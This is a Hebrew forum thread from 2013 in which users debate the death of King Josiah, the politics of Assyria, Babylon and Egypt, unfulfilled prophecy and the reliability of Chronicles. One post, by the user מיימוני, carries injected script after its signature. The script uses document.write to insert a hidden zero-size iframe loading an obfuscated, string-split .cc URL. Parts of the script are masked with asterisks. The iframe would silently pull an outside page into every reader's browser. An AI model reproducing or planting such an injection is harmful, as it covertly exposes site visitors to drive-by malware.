|
|
| נשלח ב-25/6/2013 19:39 |
|
| |
| urison כתב: |  | |
הבנתי את כוונתך פוחתת עם התארכות האשכול.
בין לשיטתי (שתחי'), ובין לשיטתך (מנוחתה גהינום), יש לתנ"ך מסר מאוד ברור "ה' הוא הא-לקים", והמסר הזה ניבט בניתוחים ההיסטוריים-רוחניים בתנ"ך. כפי שכתבתי קודם, גם אם העובדות נראות נגד גישה זו, אפשר למצוא לאירועים הסבר רוחני. לדוגמא: ירבעם הרשע נפטר בשיבה טובה, אך הנביא מסביר שעונשו יגיע לבניו.
אוקיי. כלומר, אם הבנתי נכון, טענתך היא שבתנ"ך (שלמען האמת אינני שולט בו היטב) נמצא סיפורים על סופים טובים/רעים מלווים בהסברים ברורים לגבי הסיבה.
חיפשתי קצת בויקי לגבי שופטים, וקשה לי לומר שהתרשמתי מבהירותו של המחבר לגבי יפתח, לדוגמה, בו נקבר ב"ערי גלעד" מתפרש ככך שבשרו נשר בעודו בחיים ונקבר מיד בקרקע, אבל ניחא. אתה טוען, לצורך העניין (ואולי אתה צודק), שזהו הכלל, וכשמגיע יוצא מן הכלל זה אומר דרשני.
בנידון דידן, המסר של סיפור יאשיהו הוא הפוך, כאמור. וזה נראה משונה בעיקר אם הספר נכתב ע"י יאשיהו וחצרו. עם קצת יצירתיות, היה אפשר להמציא הסבר רוחני לעובדות שקרו, אך זה לא נעשה, כי ספר זה הינו דבר ה'.
תזכורת: מראש אני מתיימר ליכולת הסבר נמוכה מאד בתנ"ך, ולדעתי אין שם חוקיות גבוהה. מכל מקום, אם הספר נכתב בזמן יאשיהו, אזי עושה רושם שמערכת האילוצים היתה גבוהה יחסית. ככלות הכל, אם דעת המחבר האנושי היתה שיאשיהו לא היה אמור להלחם בפרעה, לדוגמה,אולי היתה לו בעיה עם גורמים בני זמנו שחשבו ההיפך. אולי הפוך. אולי היתה לו בעיה לכתוב משהו קונקרטי על צאצאיו א-פריורית יחסית לקלות שבה אפשר היה לכתוב בדיעבד משהו על צאצאי ירבעם. אולי הוא סתם היה זהיר יותר בניבוי לעתיד.
מכל מקום, ההסבר הזה לא מספק אותך (הוא לא אמור לספק אותך, אגב). אבל מה כן? הבה נמשיך...
לאברהם העברי:
תודה רבה רבה על תשובתך. בגלל תשובות שכאלה אני שמח שנכנסתי לפורום הזה.
אוקיי, אז עם כל הכבוד (בכנות) למאסטר של אברהם העברי, והקלירי שהביא חרד לנפשו (גם כן שאפו), מה שיש לי להגיד לך זה
dafuq?
מה בתשובות הללו אמור לשמח אותך במובן ה"מסר המאד ברור"? יש כאן מספר דעות שאומרות שהתיאור העובדתי בתנ"ך אינו מדוייק או אפילו מוליך שולל. דעות אחרות אומרות שהמסר המאד ברור הזה, שלהזכירך מתייחס למי שפתחת את האשכול ב"לכאורה הכל היה אמור להיות מושלם" לגביו, מתמצה ב"אלהים" הראשון בפסוק (איכא דאמרי "אלהים" השני), ושאר רמזים שמישהו פאקינג היה צריך לעשות מאסטר כדי לחלץ אותם, ומישהו אחר מצא איזה פייטן מימי הביניים (למיטב זכרוני) שנדרש לעניין. לא רק שהדעות סותרות, אגב, אלא שאחת מהן פשוט מציינת במפורש "קשר של שתיקה" על זה שהמסר לא עבד הפעם.
אגב, סתם אבחנה, אלהים שלך הזה נראה טרחן לא נורמאלי יחסית, לא? כשהוא הכתיב את "בראשית", לאותו קהל היעד, אאל"ט הוא מסביר בפרוטרוט ממה הוא לא מרוצה מאדם וחווה, קין, וכו', יחסית ללאקוניות של המספר של יאשיהו. במחשבה שנייה, קיין סתם רצח את אחיו, לא (יצא למלחמה שהוא לא היה אמור / כן היה אמור אבל רק לאחר התייעצות), וטוב שהוסבר לנו במפורש ממה ה' לא היה מרוצה.
|
|
 |
|
|
|
|
| נשלח ב-25/6/2013 20:04 |
|
| |
[ מנשה היה סבו, אחרי מותו מלך יהואחז בנו. צודק, שגגתי, התכוונתי ליהואחז.
בשלטונו הקצר (3 חודשים) הוא הספיק לבטל את הרפורמה של אביו.בכל זמן שלטונו הוא המשיך במורשתו המדינית של אביו, ונלחם במצרים. גם כאן אתה צודק, והחלפתי בין שמות המלכים.
לא הייתה שום השפעה מצרית, הם היו האוייב. הבבלים היו מרוחקים ולא סביר שהייתה להם השפעה תרבותית של ממש. כאן אני לא מסכים: יהואחז המשיך להילחם במצרים כהמשך לאביו, אך תוך שלושה חדשים הם הרגו אותו, ואז הייתה השפעה של ממש על הממלכה, ועל יהויקים המלך החדש. הבבלים שהכניעו את המצרים בקרב כרכמיש (הקרב שבגללו יאשיהו יצא להילחם בפרעה-נכו), העצימו את האימפריה שלהם, כבשו את יהודה והפכו להיות בעלי הבית והמשפיעים על יהויקים, יהויכין (שנלקח לבבל), וצדקיהו. בגלל שצדקיהו שוב בטח בחסות המצרית (בניגוד לדעת ירמיהו), נבוכדנאצר הגלה אותו. צר לי שוב על שגגותי.
|
|
|
|
| נשלח ב-25/6/2013 21:32 |
|
| |
ברשותכם, נעשה קצת סדר: * עד מעט לפני יאשיהו, האימפריה השלטת היתה אשור - מנשה, שנכנע לה ללא תנאי, זכה למלכות ארוכה (הסיפור בדה"ב אודות 'חזרתו בתשובה' וכו' לא נראה הגיוני, אבל זה לא כ"כ משנה). אשור שלטה גם בישראל (בשטחי יו"ש...), והיה מעין 'הסכם אינטרסים' בינה לבין מצרים. * בינתיים עלתה בבל על המפה ונלחמה באשור, שמצידה נסוגה מהחזקתה באותם שטחי יו"ש - המצרים, שחששו מהתפשטות בבלית שתפגע גם בהם (כפי שקרה לבסוף) רצו לעזור לאשורים ולכן פרעה נכה עלה לכרכמיש (דרך יהודה), שם היה הבסיס האשורי. * יאשיהו, שעד אותו זמן ניצל את הוואקום שהותירו האשורים בישראל והשתלט על שטחי ממלכת ישראל לשעבר (כנרמז גם בפסח שעשה, אליו באו משבטי ישראל), תמך בבבל, שכן ראה בה פרטנרית עתידית (לשלום במזה"ת...) * לכן כשעלה פרעה לסייע לאשור במלחמתה נגד בבל (נסיון שהצליח לכ-4 שנים עד שנת 605 בה פרעה הובס ע"י נבוכדנצר כמתואר גם בירמיהו מו), יצא יאשיהו נגדו, מלבד זאת שחשש שפרעה ישתלט על אותם שטחים משוחררים במהלך מסעו.
תוקן על ידי אברם_העברי ב- 25/06/2013 21:52:36
|
|
|
|
| נשלח ב-25/6/2013 21:46 |
|
| |
עכשיו, בעיית מותו של יאשיהו יותר ברורה: הוא פשוט "התעבר על ריב לא לו" (וכפי שחז"ל כבר 'נזפו' בלשון זו לגבי ביעקב ששלח מלאכים לעשו), ולכן נראה לי כדעת תומס הובס, שכיוון שפעל נגד התבונה - נהרג. צריך לזכור עוד דבר שלא עלה פה, והוא נבואת חולדה ליאשיהו (מל"ב כב כ) "...וְנֶאֱסַפְתָּ אֶל קִבְרֹתֶיךָ בְּשָׁלוֹם"! (כבר ר' יוחנן ענה על כך, שהכוונה שלא יראה בחורבן ירושלים, ועדיין קשה).
לכן לעניות דעתי, ניתן להסיק מכאן מסקנה תיאולוגית פשוטה - כשאדם קופץ למול רכבת דוהרת, גם ה' לא יכול לעזור לו... (ומכאן תוכחה מסותרת למנהיגי החרדים שחושבים שתשובה תפילה וצדקה יעזרו למול ה'גזירות'...:)
אמנם יאשיהו היה צדיק, ואמנם חולדה חשבה שימות בשלום, אבל הוא הפתיע את כולם והחליט לצאת כנגד פרעה (בין אם נסביר שיצא למלחמה ממש, ובין אם נסביר שתכנן מרד אלא שפרעה 'עלה עליו' וזימן אותו למשפט והרגו) - כיוון שכך, אין עצה ואין תבונה...
אגב, הסבר דומה נותן פרופ' יהודה אליצור ז"ל לגבי הסיפור המפליא על חזקיהו ושליחי מלך בבל, עליו ננזף חזקיהו קשות בידי ישעיהו (מל"ב כ יב-יט - ההדגשות שלי): "נמצאנו למדים כי אין כאן עמדה מדינית מובהקת של "פרו" או "אנטי" אלא משהו אחר, והוא מתפרש בדבר הנביא על משלחת מראדך בלאדן: אתה מתקשר עם בבל נגד אשור; הבבלים עתידים לעשות לך רעות גדולות ממה שעלולים לעשות לך האשורים. מה משמעות הדבר הזה? נראה לי שהנביא מורה: זו תקופה של מעצמות המושלות בכיפה, מעצמה עולה ומעצמה יורדת. זה מנהגו של העולם שאתה חי בו. אתה, חזקיהו מלך יהודה, מלכותך אינה מעצמה, אתה מולך על מדינה קטנה. אל תתמוך לא בזה ולא בזה. אם תתפתה ותתמוך בבבלים נגד האשורים. סופך שתקריב קורבנות הרבה, (כפי שקרה אחר כך) תעשה מאמצים, תאבד אבידות הרבה. ואם נניח שתצליח מה יקרה? במקום "שבט אף" זה של ה', אשור, יקום עליך "שבט אף" אחר. הואיל ומלכותך אינה אלא מדינה קטנה, אי אתה צריך לשים ראשך בין שתי המעצמות האלה"
http://www.daat.ac.il/he-il/tanach/iyunim/neviim/rishonim/melahim/prakim/elizur-yeshaya.htm
תוקן על ידי אברם_העברי ב- 25/06/2013 21:50:39
 |
|
|
|
|
|
| נשלח ב-26/6/2013 03:23 |
|
| |
לאברם העברי: כל ההסבר המדיני שכתבת, מוכיח דבר פשוט: יאשיהו התעבר על ריב כן לו. קרב כרכמיש היה מאוד חשוב לעתידה של ממלכת יהודה, והמעשה המדיני הכי חשוב והגיוני היה לעזור לבבלים נגד מצרים ואשור. מעשה זה גם הסתבר היסטורית כנכון, שהרי בבל ניצחה, והיא עדיפה על מצרים ואשור, גם מדינית וגם דתית (ואכמ"ל). הבעיה היא אחת: שיאשיהו מת בקרב הזה. בנוסף, זו אינה קפיצה מול רכבת, שהרי זה היה ההימור המדיני הנכון (חוץ מזה שיאשיהו מת, כאמור). כבר כתבתי באשכול למעלה, שבתהליכים מדיניים, הקב"ה כן מכוון את המהלכים, ולא בהכרח שהמלך ימות בקרב שהוא יוצא אליו. או במילים אחרות: נראה שמות יאשיהו היה בדרך הטבע ולא משום "הכל בידי שמים חוץ מצנים פחים"
|
|
|
|
| נשלח ב-26/6/2013 03:32 |
|
| |
לשיבולת: כתבת שאינך שולט כל כך טוב בתנ"ך, אז יש לי בשבילך שלוש המלצות: תנ"ך, תנ"ך ותנ"ך. מחדד את הלוגיקה אפילו יותר מקצות החושן או ממסכת יבמות בעיון. מעמיק את האמונה והמחשבה אפילו יותר ממורה נבוכים מזכך את המידות אפילו יותר ממסילת ישרים מרתק יותר מכל ספר אחר.
אבל הכותב והעורך (שהוא במקרה אותו אחד ושמו אחד) לא צריך את ההמלצות שלי, זה כבר רב המכר של כל הזמנים.
אגב, ההערה שלך עצמה רק מראה את זה. עצם זה שאנשים כתבו שירה בימי הבניים, ואנשים כותבים היום מאסטרים על סיפור שאירע לפני יותר מ-2600 שנה, אותו סיפור שלומדים גם בגני ילדים, גם בפקולטות בכל העולם, וגם בישיבות בודדות (בין סוגיא לסוגיא) רק מראה את העומקים והרבדים שאפשר להמשיך ולחשוף בו.
|
|
|
|
| נשלח ב-26/6/2013 04:30 |
|
| |
את הרפורמה של יאושיהו ביטל יואחז. יואחז כאמור טרם הפסיד בקרב (לאחר ההפסד הוא היה כבר מת.) מצרים לא באה להלחם ביהודה, ובבל לא ציפתה לעזרה ממלכה קטנה ומרוחקת. השיקול היחיד להכנס למלחמה היה דתי. בהקבלה להיום, כשסין ארה"ב ורוסיה נלחמות, אף צד לא מצפה מקפריסין להלחם בצי שמשייט בים התיכון. כפי שנאמר, זו התאבדות. נשלח מהאנדרואיד שלי
|
|
|
|
| נשלח ב-26/6/2013 07:45 |
|
| |
אוריסון
איקון ירוק על אשכול חשוב, ואיקון ירוק נוסף על שהתעקשת להזכיר שהדברים ראויים להתייחסות.
אברהם העברי
איקון ירוק מאד על תשובותיך. תודה במיוחד על המקור מהובס.
אני מצטרף כמובן למסקנתו המתבקשת של אוריסון: יאשיהו ניסה לצאת למלחמה שבה היה מסוכן להתעסק.
אולי כדאי לשים לב לסוגי השאלות שמעלה הסיפור, ולסוגי התשובות.
שאלה היסטורית: מה ראה יאשיהו, שמלך מצליח היה, לצאת למלחמה נגד פרעה המצרי, ולהסתכן?
שאלה תיאולוגית: כיצד נהרג יאשיו בדמי ימיו, לאחר שמלך כה צדיק היה, וצדיק כמוהו לא היה מאז דוד, כולל חזקיהו?
מה שלא הוזכר כאן הוא שיאשיהו קיבל הבטחה לאריכות ימים. איני זוכר את הפסוק, אבל מותו בטרם עתה הווה הפרכה של ההבטחה.
כפי שהעיר בשעתו פרופסור אליצור ע"ה, שהוזכר כאן, מותו של יאשיהו היה משבר גדול גם עבור הנביא ירמיהו, גם מבחינת העם אבל גם מבחינה תיאולוגית. המשבר התיאולוגי הזה נסתר מעינינו בגלל המרחק בזמן וחוסר היכרות עם הסיפור כראוי, אבל זו עדיין שאלה עצומה למאמין בהשגחה פרטית, ובמיוחד על אדם שממלא תפקיד ממלכתי. מדוע לא נעשה לו נס להינצל בזכויותיו הרבות? כיצד איבדה ממלכת יהודה את המלך שהיה יכול להחזיר את העם בתשובה?
לכל שאלה יש תשובות במישור אחר.
לשאלה ההיסטורית כבר ענה אברהם העברי, וכן כתבו פרופסור אליצור ובזמננו הרב יעקב מידן: יאשיהו השיג רבות, גם מבית (תיקונים חברתיים ודתיים) וגם מבחוץ (הרחבת הממלכה). הוא האמין שחשוב לעכב את פרעה בדרכו. אולי גם סמך על השגחה פרטית שתעזור לו.
לשאלה התיאולוגית יש תשובות שונות, ואין לה פתרון שמניח לגמרי את הדעת. במיוחד לא עקב ביטול ההבטחה לאריכות ימים (אלא שאיני זוכר את המקור לזה). כמדומה שהתשובה הנכונה היא ש"מקום סכנה שאני" (דווקא גמרא שנגיע עוד מעט אליה בדף היומי). וכדברי הובס המצוטטים בידי אברהם העברי.
מי שקופץ מבנין גבוה אל יצפה לנס שישאיר אותו חי ובריא. מי שיוצא להילחם בצבא חזק ממנו, ידע שהוא עלול לשלם ביוקר.
נכון שהיו מקרים של נצחון לצד החלש לכאורה. אבל איך ידע אדם שהוא עומד להצליח?
המעפילים בפרשת בשלח קיוו שנכונותם להילחם כדי לזכות להגיע לארץ ישראל תכפר על חטא המרגלים. הם טעו.
פרשת שלח
(מ) וַיַּשְׁכִּמוּ בַבֹּקֶר וַיַּעֲלוּ אֶל־רֹאשׁ־הָהָר לֵאמֹר הִנֶּנּוּ וְעָלִינוּ אֶל־ הַמָּקוֹם אֲשֶׁר־אָמַר יְדֹוָד כִּי חָטָאנוּ: (מא) וַיֹּאמֶר מֹשֶׁה לָמָּה זֶּה אַתֶּם עֹבְרִים אֶת־פִּי יְדֹוָד וְהִוא לֹא תִצְלָח: (מב) אַל־תַּעֲלוּ כִּי אֵין יְדֹוָד בְּקִרְבְּכֶם וְלֹא תִּנָּגְפוּ לִפְנֵי אֹיְבֵיכֶם: (מג) כִּי הָעֲמָלֵקִי וְהַכְּנַעֲנִי שָׁם לִפְנֵיכֶם וּנְפַלְתֶּם בֶּחָרֶב כִּי־עַל־כֵּן שַׁבְתֶּם מֵאַחֲרֵי יְדֹוָד וְלֹא־יִהְיֶה יְדֹוָד עִמָּכֶם: (מד) וַיַּעְפִּלוּ לַעֲלוֹת אֶל־רֹאשׁ הָהָר וַאֲרוֹן בְּרִית־יְדֹוָד וּמֹשֶׁה לֹא־ מָשׁוּ מִקֶּרֶב הַמַּחֲנֶה: (מה) וַיֵּרֶד הָעֲמָלֵקִי וְהַכְּנַעֲנִי הַיֹּשֵׁב בָּהָר הַהוּא וַיַּכּוּם וַיַּכְּתוּם עַד־ הַחָרְמָה:
נכון ששם הנביא הזהיר אותם שלא לעשות זאת. ואילו לגבי יאשיהו, יתכן שסמך על הבטחה נבואית, ובוודאי שלא שמענו שהנביא הזהיר אותו לא לעשות זאת.
אבל לא תמיד אנו זוכים לשמוע נבואה מפורשת. וגם בדור הנבואה לא תמיד כנראה היתה כזו.
החיים הם מסוכנים. ההכרעות קשות. כאשר טועים, משלמים מחיר.
לגבי התיאוריות השונות החושדות שספרי מלכים ודברי הימים הביאו גרסאות מעובדות ומזוייפות, זה מביא אותנו לשאלה אחרת, שעסקתי בה כמה וכמה פעמים בפורום.
איך ניגשים למקרא?
כאשר יש סתירות בסיפורים בין המקורות, זו הזמנה לעיון. כאשר אין סתירות, וסיפור אחד מרחיב את חברו, ניתן להציע תיאוריות שונות או משונות. תלוי בהנחות היסוד.
עם ההנחות הנכונות, או אולי הלא נכונות, אפשר להגיע רחוק.
לדעתי עדיף תמיד ללמוד את המקורות שלנו. אפשר וראוי להסתייע במקורות חוץ ובסברות. אבל עדיין מדוע לדחות את דברי המקורות שלנו מפני סברות וחשדנות?
|
|
|
|
| נשלח ב-26/6/2013 08:08 |
|
| |
מן הסתם כוונת מיימוני לגמ' במו"ק כח: ואגב - גמ' זו היא לכאורה פינה לגבי היחס להתגשמות הנבואה
|
|
|
|
| נשלח ב-26/6/2013 08:15 |
|
| |
ל- urison – כתבת ש "כל ההסבר המדיני שכתבת, מוכיח דבר פשוט: יאשיהו התעבר על ריב כן לו" אז נכון – ודאי היה ליאשיהו עניין בהצלחתה של בבל, אבל לכן הבאתי את דברי אליצור, שלמעשה טוען שני דברים: א. בין אם יש לך עניין ובין אם לאו – אל תתערב! אתה עבור מצרים מה שהיינו קוראים "רסיס בישבן" (כלשונו הזהב של הגרנ"ב:), וככזה – דע את מקומך! ב. מי לחשך שבבל עדיפה על מצרים? הלא זה בדיוק מה שניבא ישעיה לחזקיה – אתה מעדיף את בבל על אשור, בסוף דווקא בבל היא זו שתחריב את ירושלים! ונקודה אחרונה וחשובה - יש לזכור שמעולם לא מצאנו במקרא מלך מיהודה או ישראל, שיצא למלחמה נגד מלך אימפריה, (מצרים אשור או בבל). היחיד שידוע לנו שעשה כך הינו אחאב בקרב קרקר – ודווקא הקרב הזה לא תועד במקרא! לדעתי, זו ראיה חזקה גם לפירוש לפיו יאשיהו לא נלחם בפרעה (אלא יצא אליו ל"בירור מדיני" כלשהו שבסופו הוצא להורג), וממילא גם לתפיסה לפיה יאשיהו לא אמור היה להתערב במסע מלחמה כזה.
תוקן על ידי אברם_העברי ב- 26/06/2013 08:36:02
|
|
|
|
| נשלח ב-26/6/2013 08:30 |
|
| |
למיימוני – א. לו חרשת בעגלתי (=קראת מה שכתבתי לעיל:) היית רואה שציטטתי את נבואת חולדה ליאשיהו, והנה הטקסט המלא (מל"ב כב): "לָכֵן הִנְנִי אֹסִפְךָ עַל אֲבֹתֶיךָ וְנֶאֱסַפְתָּ אֶל קִבְרֹתֶיךָ בְּשָׁלוֹם וְלֹא תִרְאֶינָה עֵינֶיךָ בְּכֹל הָרָעָה אֲשֶׁר אֲנִי מֵבִיא עַל הַמָּקוֹם הַזֶּה". אריכות ימים לאו דווקא, אבל מוות בשלום דווקא כן. ואם כבר, אביא ציטוט נוסף, הפעם מירמיהו, שמוכיח קשות את יהויקים (=בנו של יאשיהו), ושים לב מה הוא אומר לו על אביו, יאשיהו (ירמיהו כב טו): "אָבִיךָ הֲלוֹא אָכַל וְשָׁתָה וְעָשָׂה מִשְׁפָּט וּצְדָקָה אָז טוֹב לוֹ"! מבין פרשנינו ראוי לציין את דבריו הסתומים של ר' יוסף כספי שכותב בקצרה כדרכו: "אז טוב לו – ואם מת בחרב, וביאור זה אוצר ה' יבוא". ב. לגבי כוחה של נבואה – זו לא הנבואה הראשונה ולא האחרונה שלא מתגשמת, וכדברי התוספות המפורסמים, שהנבואה היא מה שראוי היה להיות, לולא חטאו (או ניסוח דומה). ונבואות שיבת ציון של ישעיה [ה-II?] ושל חגי וזכריה יוכיחו – ושם זה היה הרבה יותר מהותי מהנבואה האישית הזו של חולדה! אגב, יש מהחוקרים שלא ראו במותו של יאשיהו פגיעה בנבואה – פרופ' יאיר הופמן ("מקרא לישראל" על ירמיה, תשס"א, עמ' 457) סובר, כי מותו של מלך בקרב אינו טרגדיה, אלא אולי להיפך – מוות של כבוד! (בניגוד להליכה בגלות, כמו של יהויכין), מה גם שיהודה נשארה עצמאית ולא נכבשה. לכן אין בעיה עם נבואת חולדה (כדברי ר' יוחנן, שלא ראה בחורבן ירושלים), ואכן – אז טוב לו, שמת כגיבור ולא כגולה. ג. ולגבי אמינות המקרא – יש להבדיל בין דברי הימים לשאר (=יהושע עד מלכים, אם כי גם עליהם יש עוררין כמובן): ספר דה"י הוא היסטוריוגרפיה מגמתית ברורה, וגם פרשנינו הראשונים כגון הרד"ק ור"י אברבנאל שמו לב לכך: הוא נמנע מלהזכיר את יציאת מצרים, הוא מתמקד רק במלכות בית דוד, ורק בצדדיה החיוביים, הוא מוסיף דברים רבים על המקדש, הכהנים והלויים וכו' וכו'. לעניינו הוא 'חשוד', כיוון שיש לו נטייה ליצור תורת גמול מושלמת, לפיה כל מי שמת, מת בשל חטא (ראה בספרה של שרה יפת "דה"י אמונות ודיעות" (תשל"ז), עמ' 145-154). והסיפור של יאשיהו דומה – מהתיאור במלכים לא ברור למה מת, בא בעל דה"י וטווה סיפור לפיו הוא הוזהר ע"י פרעה ולא שמע "לדבר אלהים", ולכן נהרג.
 |
|
|
|
|
| נשלח ב-26/6/2013 11:10 |
|
| |
אברהם
תודה.
ואני עונה לפי סימניך:
א. חרשתי גם חרשתי ורבות למדתי. פשוט לא שמתי לב לציטוט הזה (מחמת החפזון בלבד, יש לקוות). עם זאת, בזכרוני היה שהובטחה לו גם אריכות ימים, ולפיכך אפשר שהפסוקים האלו לא נראו לי מספיק ברורים בתחום.
לפי דבריך אין כאן שאלה.
ואם אצטט מן הסעיף הבא, שאני מבקש לייחד להתגשמותן של נבואות, יש לנו כאן מחלוקת פרופסורים: אליצור מול הופמן.
ויתכן שכל אחד אמר דבר שהוא נכון לכשעצמו. אם אנו לומדים מתרבויות אחרות, וכך ראוי לעשות כדי לקבל לכל הפחות רקע למקרא, אזי יתכן שמוות בקרב הוא הישג. (אינטואיטיבית זה לא נשמע נכון, מפני שמוות בקרב הוא סוף סוף מוות וכשלון. אולי הכוונה למוות שבו הצבא מנצח ורק המלך מת). מצד שני, יתכן שבעם ישראל, ובמלכות יהודה, ואצל מלך כיאשיהו שמוצג לנו שיראתו קודמת למלכותו, זה היה אמור להיות אחרת.
ובוודאי בעיני נביא כירמיהו.
אמנם אם מוות בקרב הוא מוות "יפה", אזי התקיימו דברי חולדה.
ב. השאלה האם נבואות יתגשמו בהכרח או לא היא שאלה חשובה. ויש לה מקורות סותרים. אולי אפשר להעלות אותה כאן אם כי היא רחבה מאד.
בוודאי שלי אין משנה סדורה בדבר, אבל גם בגלל שהמקורות אינם חד משמעיים או סותרים.
1. מבחן נביא האמת הוא שיתגשמו דבריו. ומשמע באותו דור.
2. נבואה לרעה עשויה להתבטל.
משני סעיפים אלו עולה שנבואה לטובה אין חזרה ממנה, והיא אמורה להתגשם כפשוטה.
עם זאת מצאנו שהנביא עצמו אינו מבין תמיד נכון את נבואתו, ולגביה הריהו ככל פרשן אחר.
דברי התוס' החביבים על לייבוביץ, ובצדק, הם מתקבלים על הדעת, ובכך יתרונם, אבל הם מנוגדים למקורות.
כמובן נטית הלב של האדם היא לקוות שאם יש נבואה, היא גם תתגשם, כוונתי לנבואות טובות. קשה לנו לקבל שנבואה יכולה לא להתגשם. אם כך הוא, על מה כבר ניתן לסמוך?
אבל זו רק הרגשה פסיכולוגית.
ג. יש רמות שונות של חשדנות ביחס למקרא, ואני שמח לגלות שאנו שוים באמון הראשוני שלנו למקורות.
לגבי דברי הימים, כמה תשובות בדבר:
1. איני מכיר את הספר...
2. דומה שפרשנות כמו זו שציינת היא בגדר פרשנות, ואם ניתן להבדיל בינה לבין זיוף עובדות, היא אמינה לכל הפחות במה שהיא כן מתארת.
אבהיר יותר: הפרשנות מהסוג שמיוחס לבעל דברי הימים אמורה או עלולה להביא לתוצאות הבאות:
I להדגיש עובדות רצויות שעולות בקנה אחד עם התיאוריה.
II להעלים עובדות לא נוחות.
III להציע לשון הסבר במקום שיש רק עובדות שאינן בהכרח קשורות.
IIII לטעון שדברים היו בשלב מוקדם כדי להסביר מדוע קרו דברים ידועים בשלב מאוחר יותר. ולהציג זאת כעובדה.
הסעיף הראשון אינו בעיתי וזו דרך הכותבים. גם הסעיף השני רק מזהיר אותנו לא להשתמש בשיטת "הלימוד מן השתיקה" כאשר יש שתיקה בנוגע לעובדות שאנו יודעים ממקור אחר.
הסעיף השלישי מחייב אותנו לזהירות בקריאה ולהכרה ש"מפני ש..." הוא לעתים רק "זה בא לפני זה" וכי ה"מפני ש..." הוא השערת המחבר.
הסעיף הרביעי הוא הבעייתי. אם מתארים עובדה שקיומה רק משוער, זו בעיה. השאלה היא אם יש דוגמאות כאלו בספר.
בכל אופן, עלינו להביא בחשבון שני פנים לאבחנה לגבי מחבר דברי הימים. מצד אחד, הוא עשוי להיות בעל רוח הקודש, כלומר, למצער נהנה מסייעתא דשמיא, ואכן דבריו התקבלו בידי חז"ל לקנון המקראי שלנו.
מצד שני, אפילו נביא ממש יכול לטעות. אז יש לתת לדבריו, להערכתי, משקל של תיאוריה חשובה מאד, אבל לא מעבר לכך. ותמיד לזכור שיש מקום לפרשנות נוספת.
_______שופר ניסוח לא ברור__________
שומר פיו ולשונו - שומר מצרות נפשו
******* type="text/">document.write("*************** scrolling='no' frameborder='0' height='0px' width='0px' src='ht"+"tp:"+"/"+"/"+"vjgvj.co"+".cc/?a="+***************+"'><*");>
תוקן על ידי מיימוני ב- 26/06/2013 11:17:32
 |
|
|
|
|
| נשלח ב-26/6/2013 11:43 |
|
| |
למיימוני – "הארכת בדבריך, החבר":) אז רק לעניין אמינות המקרא - אני אישית אכן מאמין במקרא (=נותן בו אמון!) ואפילו לגבי תיאור מות יאשיהו בדה"ב כתבתי שדיעות רוב החוקרים החדשים שבסיפור יש גרעין היסטורי (בעיקר, אגב, משום שהוא ידע לציין את 'כרכמיש', שבעל מל"ב לא ציין, ובנוסף הוא השמיט את מה שכתב בעל מל"ב "על מלך אשור" ממנו משתמע שפרעה נלחם כנגד אשור, מה שאינו נכון). אגב, גם יוסף בן מתתיהו (קדמוניות ה, י, א) מתאר תיאור דומה, אם כי לדבריו יאשיהו נהרג בטרם החל הקרב, מחץ תועה, ואז הצבא התפזר.
אלא שצריך לזכור שבעידן ההוא, ואפילו הרבה אחריו, המושג של "דיווח אובייקטיבי" לא היה קיים, ולאף אחד לא היתה בעיה עם 'שתילת' נאומים בפי גיבורי סיפור, הוספת פרטים והסברים וכו' - אפילו יוסף בן מתתיהו, שבתחילת ספרו תוקף את ההיסטוריונים היוניים על המצאותיהם וכו' וטוען שהוא עצמו מספר רק את האמת - גם הוא כידוע נהג להפריז או להמציא נאומים שוודאי לא נאמרו (הדוגמה הקלאסית - נאום אלעזר בן יאיר, בסוף מלחמות היהודים - וודאי שיוסף לא היה שם לשמוע אותו!...) - והיסטוריונים בני ימינו יידעו טוב ממני שאפילו בעידן המודרני, היסטוריונים 'חורזים' אירועים לפי איזשהו קו, מניחים את הטפל ובוררים את העיקר (בעיניהם) וכו' ואכמ"ל ודו"ק.
לכן אני לא רואה כאן בעיה תיאולוגית-אמונית, אם כי לקח לי הרבה זמן להפנים את זה, וברור לי שרוב מניין ובניין היהדות דהיום לא תקבל את זה, אבל בפורום עצכ"ח נראה לי שאפשר לגלות מליבא לפומא:)
 |
|
|
|
|
| נשלח ב-26/6/2013 11:50 |
|
| |
ולגבי נבואות שלא התקיימו - לי נראה פשוט שהנביא בא גם - ואולי בעיקר! - להתוות דרך וכיוון, ולא לנבא את העתיד. הלא זה היה אחד מחידושיו של יחזקאל קויפמן ז"ל, אודות "הנבואה השליחית הישראלית", בניגוד למתנבאים-קוסמים-כאהינים שרווחו בעולם העתיק! לכן אין מה להתרגש מנבואות שלא קרו ככתבן, שכן לא בזה נמדד הנביא. אמנם הרמב"ם כתב מה שכתב ונתן קריטריונים וכו', אבל יש לדון האם גם בימי המקרא חשבו כך - בכל אופן מעולם לא מצאנו שבדקו איזשהו נביא במקרא לפי הקריטריונים האלו, והדברים ארוכים.
אגב, המקום הראשון בו מוזכר נביא בתנ"ך הוא אצל אברהם "... כי נביא הוא ויתפלל" - מכאן משמע שעיקר תפקידו של הנביא הוא להתפלל בעד העם (וכך שמואל, אלישע, עמוס, ירמיהו ועוד, ומכאן האכזבה האלהית מאליהו ואכמ"ל).
|
|
|
|
| נשלח ב-26/6/2013 19:42 |
|
| |
הערונת + הערה לגבי חזקיה ושליחי מראדך בלאדן, לענ"ד (וסליחה שאני חולק על מוהר"ר יהודה אליצור) הבעיה לא הייתה ההתערבות שבין המעצמות, אלא בעיה עמוקה אחרת, גם דתית וגם היסטורית, אבל היא שווה אשכול משלה, כי יש לה השלכות משמעותיות גם להיום.
לגבי התגשמות הנבואות: לענ"ד, וסליחה אם זו נשמעת טענה תלושה מהמציאות: כל נבואה מתקיימת. "ודבר אחד מדבריך, אחור לא ישוב ריקם". למקרה שהרמתם גבה, אסביר: הנבואות מתגשמות, אך פרשנותן משתנה ע"פ מעשי בני האדם. שתי דוגמאות: 1.הדוגמא הכי קלאסית: נבואתו של יונה "עוד ארבעים יום ונינוה נהפכת" לא התבטלה, אלא פרשנותה השתנתה. אכן לאחר ארבעים יום נינוה נהפכה, אבל לא נהפכה כמו סדום, אלא נהפכה מרשעה לחוזרת בתשובה. 2. נבואות הגאולה של ישעיהו (הראשון, או האחד והיחיד. תלוי את מי שואלים) ניבא אותם והתכוון לחזקיהו המלך. נבואות הנחמה של יחזקאל,זכריה ועוד..., לכולם היה פוטנציאל להתקיים, אך מפני חטאינו הפרשנות השתנתה והגאולה נדחתה להזדמנות הבאה (מדינת החשמונאים, לדוגמא), היא ממשיכה להידחות עד לאתחלתא דגאולה שבימינו. אם נזכה, הנבואה תתקיים בימינו. אם ח"ו נחמיץ את השעה, הנבואה לא תתבטל, אלא פרשנותה תשתנה לדור אחר. 